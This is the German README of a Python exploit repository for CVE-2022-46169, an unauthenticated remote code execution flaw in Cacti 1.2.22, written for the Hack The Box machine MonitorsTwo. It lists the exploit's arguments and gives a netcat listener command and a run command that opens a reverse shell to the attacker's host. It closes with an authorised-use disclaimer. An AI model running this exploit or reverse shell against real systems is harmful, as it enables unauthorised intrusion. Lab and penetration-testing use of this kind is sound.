
Python-Exploit für CVE-2022-46169, der eine nicht authentifizierte Remote-Code-Ausführung auf Cacti 1.2.22 über eine Reverse Shell ermöglicht, vorgesehen für Bildungs-Penetrationstests.
Dieses Repository enthält einen Exploit für CVE-2022-46169, der Cacti 1.2.22 betrifft. Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebigen Code auf dem betroffenen System auszuführen.
Wenn Sie eine detaillierte Beschreibung darüber wünschen, wie dieser Exploit möglich ist, lesen Sie bitte diesen Rapid7-Beitrag. Sie gehen sehr ins Detail.
Ich habe diesen Code mit Hilfe von chatGPT für eine Hack The Box-Maschine namens MonitorsTwo zu Bildungszwecken geschrieben.
Arguments:
-u URL of Cacti Application
-lhost IP address of machine you want the shell on
-lport Port of the machine you want the shell on
Set up a listener on your local machine with netcat nc -lvnp 9001
Run the exploit against the target
python3 CVE-2022-46169.py -url http://10.10.11.211/ -lhost 10.10.14.3 -lport 9001
Dieser Proof of Concept (PoC) ist ausschließlich für Bildungs- und Testzwecke gedacht. Die Anwendung dieses PoC auf einem System oder Netzwerk ohne ausdrückliche Genehmigung des Systemeigentümers ist rechtswidrig und kann rechtliche Schritte nach sich ziehen. Der Ersteller übernimmt keine Verantwortung für Schäden, die durch die ordnungsgemäße oder unsachgemäße Anwendung dieses PoC entstehen. Verwendung auf eigene Gefahr.
https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/